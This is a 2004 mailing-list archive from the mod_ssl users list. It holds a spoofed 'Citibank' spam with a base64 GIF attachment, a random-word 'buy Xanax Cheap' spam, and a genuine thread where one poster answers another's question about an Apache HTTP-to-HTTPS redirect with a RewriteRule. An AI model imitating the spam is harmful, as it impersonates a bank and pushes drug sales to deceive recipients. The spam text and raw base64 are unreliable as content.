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
502oRp77dZk1mXQyqZlQKZhG1j3aB162Z4JyN1QpVs7uKXCm2HiL+Ze9SXkoeYToJIZ9Z5qVF8+1PM/p
/J64l03WV5Xul2kaOJhryWVsZ4oR2c5U+c7Ux5VxRVlix4LrmdCo1oGtfNAGnc1IZnqCOIQDaJlRWVUv
qM+xfEEg3ZIiPYv0jM4SbZVkqJzrfNECDc+zJ884fYof7XrWbNHjlNPdjDyKOXU8nYYf9ocMJs3/sNln
HObU7flSvkmIo2ibSaPQx+zVjRiFqKiIHKiblMjMXplMEXc7WubRkhzT68jKl3yd1jaNdyDXlayMruZH
df3XgB3Ygj3YhF3Yhn3YiJ3Yir3YjN3Yjv3YkB3Zkj3ZlF3Zln3ZmJ3Zmr3ZnN3Znj0mgIIAXgAoSxDa
NkDaJYDan00Ipt0Fqn0Er00Dqi3asEHbqy0IpB3bTaDbRMDb+2Hbt83aos3buV3cJBDatl3cw53cy33c
rV3buo3cIiDdqd3ayt3c043d1E3dtZ3d3u3bwb0Dxm0Cpl3etI3a6K3c3Q3d653e3k3e5x3f8P3d8t3e
y13f9v3e6Y3d4e0D/7MN3Ppd3+6d3wQ+4ANe3QE+386d4AXO3Axu4ADe3zrw3woO4dst4Bie3Rd+AhCu
4E+R4Q3+4Q8O4hLOG8gd3SCO4iPO4Ate4fgt4i3e4QQe4jRe4hMO4LEt4zqO4dpN4jH+4gm+4+y93iFu
3eNt48yB40rO4twt5K/d5BGu4Q4O3wd+5OP95M/d3e4N3kg+FVyOA1/e5Tsx5UAQ5mKuE9xd5lF+5mze
5m4u4QwQ50nAADRA5z0Q53hu5yWQ5yPA5yLg53te53Le5yag52/uA3pu6E6g6BXA6IH+6IRO6IZO55O+
547e6JFOApd+6Dug6JuOBIz+6Xbu55s+6JKu6f+WfgKeDumc/gOlbuqUnuiZTumY/ue0jumDjud1Xut/
zuuF7uu33uun/uuq3ui53uembuyyPurGfuaXLuvNXuvQHu3MTu3VLuq+LuzFXumVPuysjuq8Xu3SHumw
Lu42/uzkPuvAnu7CDu3YHuooYO7BHu7aDu7E7u7EPu7q3uXo3u7q3u36HvDm/uvcXuz1Pu/4nu+PnvD2
Lu+Zfu4Lz+70DvDiXvH1fu+6nu3rrundnufJfvHXLvH7TvHOvu/S7vAN3+4Wr/HfrvGr7u0uH+8jL/Er
P+kDf+4fn/G4/vImL+c1/+nKrvPITuo6D+j2XujJPuoVn/Swjuof3+pHH/UbNgD05kD1rd7vNTDtEmH1
nB7qXC/0Ww/16hECACH+dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0
Z2xvd2NrZWZscWJ6am55eGpzZnVzaWlmc3libGlmcGhnaHZmbm92dHdkeW5vcwA7

--------------090305010409010705050006--


From user-supports11@citibank.com  Sat Jun 19 22:50:34 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from 222-152-140-3.jetstream.xtra.co.nz (222-152-140-3.jetstream.xtra.co.nz [222.152.140.3])
	by master.modssl.org (Postfix) with SMTP id 81425A898B
	for ; Sat, 19 Jun 2004 22:49:09 +0200 (CEST)
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
FCC: mailbox://user-supports11@citibank.com/Sent
X-Identity-Key: id1
Date: Sat, 19 Jun 2004 17:45:56 -0400
From: Citibank 
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: !Warning all Citibank users
Content-Type: multipart/related;
 boundary="------------090305010409010705050006"
Message-Id: <20040619204909.81425A898B@master.modssl.org>

This is a multi-part message in MIME format.
--------------090305010409010705050006
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit


Movies in 1855 Which one? in 2000 Mad Cow Disease 


--------------090305010409010705050006
Content-Type: image/gif;
 name="congressional.GIF"
Content-Transfer-Encoding: base64
Content-ID: 
Content-Disposition: inline;
 filename="congressional.GIF"

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

--------------090305010409010705050006--


From vtwda711@myexcel.com  Sun Jun 27 14:31:05 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from cm221.gamma227.maxonline.com.sg (cm221.gamma227.maxonline.com.sg [202.156.227.221])
	by master.modssl.org (Postfix) with SMTP id 034C0A893D
	for ; Sun, 27 Jun 2004 14:30:39 +0200 (CEST)
Received: from 18.60.90.242 by 202.156.227.221; Sun, 27 Jun 2004 16:30:59 +0300
Message-ID: 
From: "Brooke Zuniga" 
Reply-To: "Brooke Zuniga" 
To: modssl-users-l@master.modssl.org
Subject: buy Xanax Cheap 
Date: Sun, 27 Jun 2004 07:30:59 -0600
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--886703793898880384"
X-Priority: 3
X-MSMail-Priority: Normal

----886703793898880384
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable





<=
br>



Kcenterline vita author chlorine fife worktable borroughs literary obj=
ectivity clapeyron weekend surgical vincent=20.Vdredge none jocular sheaf =
malarial astrophysical brassy giraffe ignorant spigot deprivation catch ba=
ltimore=20?



----886703793898880384--


From owner-modssl-users@modssl.org  Tue Jun 29 12:00:16 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 67743A8978; Tue, 29 Jun 2004 12:00:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cimserv.exponent.net (host81-134-90-101.in-addr.btopenworld.com [81.134.90.101])
	by master.modssl.org (Postfix) with ESMTP id DC36AA8959
	for ; Tue, 29 Jun 2004 11:59:59 +0200 (CEST)
Received: from cimweb.no-ip.org (localhost [127.0.0.1])
	by cimserv.exponent.net (8.12.10/8.12.4) with ESMTP id i5T9xiEf020204
	for ; Tue, 29 Jun 2004 09:59:44 GMT
Received: from 192.18.1.5
        (SquirrelMail authenticated user cim);
        by cimweb with HTTP;
        Tue, 29 Jun 2004 10:59:44 +0100 (BST)
Message-ID: <54110.192.18.1.5.1088503184.squirrel@192.18.1.5>
Date: Tue, 29 Jun 2004 10:59:44 +0100 (BST)
Subject: HTTP to HTTPS redirect on virtual host on port 8080
From: "Christopher McClan" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.3a
X-Mailer: SquirrelMail/1.4.3a
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
X-yoursite-MailScanner-Information: Please contact the ISP for more information
X-yoursite-MailScanner: Found to be clean
X-MailScanner-From: cmcclan@btconnect.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Christopher McClan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm currently running an Apache web server with Mod_SSL, and have the
following virtual host statement:


  
      SSLEngine on
      SSLCertificateFile      /xx/xxx/xxx.crt
      SSLCertificateKeyFile   /xx/xxx/xxx.key
      SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   
   ServerName mywebserver
   DocumentRoot /xxx/xxx/xxx/xxx
   
     Options Indexes FollowSymLinks MultiViews +ExecCGI
     Allow from all
   


If I connect using http, I get an Apache error stating that this an SSL
enabled server, and I should use https.

My question is, how do I get it to redirect from http to https? This seems
easy enough if you aren't running a virtual server on a specific port and
just want to redirect to https for certain directories, but in this
configuration I've not been able to achieve this.

Thanks,

CIMLinux

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 29 12:49:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 66A49A893A; Tue, 29 Jun 2004 12:49:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60707.mail.yahoo.com (web60707.mail.yahoo.com [216.109.117.230])
	by master.modssl.org (Postfix) with SMTP id D9C0DA8975
	for ; Tue, 29 Jun 2004 12:49:15 +0200 (CEST)
Message-ID: <20040629104840.72201.qmail@web60707.mail.yahoo.com>
Received: from [62.129.121.32] by web60707.mail.yahoo.com via HTTP; Tue, 29 Jun 2004 03:48:40 PDT
Date: Tue, 29 Jun 2004 03:48:40 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: HTTP to HTTPS redirect on virtual host on port 8080
To: modssl-users@modssl.org
In-Reply-To: <54110.192.18.1.5.1088503184.squirrel@192.18.1.5>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--- Christopher McClan  wrote:
> Hi,
> 
> I'm currently running an Apache web server with
> Mod_SSL, and have the
> following virtual host statement:
> 
> 
>   
>       SSLEngine on
>       SSLCertificateFile      /xx/xxx/xxx.crt
>       SSLCertificateKeyFile   /xx/xxx/xxx.key
>       SetEnvIf User-Agent ".*MSIE.*" nokeepalive
> ssl-unclean-shutdown
>    
>    ServerName mywebserver
>    DocumentRoot /xxx/xxx/xxx/xxx
>    
>      Options Indexes FollowSymLinks MultiViews
> +ExecCGI
>      Allow from all
>    
> 
> 
> If I connect using http, I get an Apache error
> stating that this an SSL
> enabled server, and I should use https.
> 
> My question is, how do I get it to redirect from
> http to https? This seems
> easy enough if you aren't running a virtual server
> on a specific port and
> just want to redirect to https for certain
> directories, but in this
> configuration I've not been able to achieve this.

You'll have to run another virtual server on another
port. Then redirect to your https server. You can't
run http/https on the same port. Suggest 8080 as http
and 8443 as https. Then ...

RewriteEngine On
RewriteLog "logs/rewrite.log"
RewriteLogLevel 0
RewriteRule ^/(.*) https://xxxx:8443/$1 [R=301,L]





		
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 29 23:32:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E4FADA8958; Tue, 29 Jun 2004 23:32:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
